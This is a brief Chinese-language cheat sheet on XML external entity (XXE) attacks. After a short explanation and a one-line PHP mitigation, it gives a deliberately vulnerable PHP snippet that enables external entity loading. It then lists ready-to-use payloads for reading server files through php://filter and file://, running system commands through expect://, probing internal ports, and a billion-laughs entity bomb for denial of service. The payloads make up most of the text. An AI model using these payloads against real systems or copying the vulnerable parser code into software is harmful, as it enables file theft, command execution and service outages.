XXE

可扩展标记语言(英语:Extensible Markup Language,简称:XML)是一种标记语言,是从标准通用标记语言(SGML)中简化修改出来的。它主要用到的有可扩展标记语言、可扩展样式语言(XSL)、XBRL和XPath等。

目录

XML 被设计用来传输和存储数据,其焦点是数据的内容。 HTML 被设计用来显示数据,其焦点是数据的外观。

当允许外部的xml文档被引用时,攻击者可以通过构造含有恶意内容的xml文档,来实现文件读取,命令执行,端口扫描,DDOS等攻击

在php中可以将libxml_disable_entity_loader配置设置为true来禁止使用外部xml文档

PHP源码

<?php
    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    echo $creds;
?>

Payload

-----------------------任意文件读取-----------------------------
<?xml version="1.0"?> 
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource= 目标文件的绝对路径 " > ]> 
<abc>&xxe;</abc>

<?xml version="1.0"?> 
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "file:///目标文件的绝对路径" > ]>
<abc>&xxe;</abc>

------------------------命令执行--------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "expect://系统命令 " > ]> 
<abc>&xxe;</abc>

------------------------探测端口--------------------------------
<?xml version="1.0"?>
<!DOCTYPE abc [  <!ENTITY xxe SYSTEM "http://127.0.0.1:80" > ]> 
<abc>&xxe;</abc>

-------------------------DDOS----------------------------------
<?xml version="1.0"?> 
<!DOCTYPE abc [
  <!ENTITY lol "lol">
  <!ELEMENT lolz (#PCDATA)>
  <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]> 
<abc>&lol9;</abc>